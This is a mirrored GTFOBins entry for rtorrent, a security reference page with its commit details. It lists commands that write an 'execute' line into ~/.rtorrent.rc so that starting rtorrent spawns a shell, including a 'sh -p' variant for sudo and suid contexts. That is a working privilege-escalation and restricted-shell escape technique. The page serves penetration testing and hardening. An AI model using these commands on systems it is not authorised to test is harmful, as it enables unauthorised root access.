1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-03-07 06:31:33 +01:00
GTFOBins.github.io/_gtfobins/rtorrent
Andrea Cardaci c98ff9159a Fix rtorrent quotes
Fix #563.
2026-02-22 14:03:27 +01:00

18 lines
422 B
Plaintext

---
functions:
shell:
- code: |-
echo 'execute = /bin/sh,-c,"/bin/sh </dev/tty >/dev/tty 2>/dev/tty"' >~/.rtorrent.rc
rtorrent
comment: |-
After the shell, exit with `Ctrl-Q`.
contexts:
sudo:
suid:
code: |-
echo 'execute = /bin/sh,-p,-c,"/bin/sh -p </dev/tty >/dev/tty 2>/dev/tty"' >~/.rtorrent.rc
rtorrent
shell: false
unprivileged:
...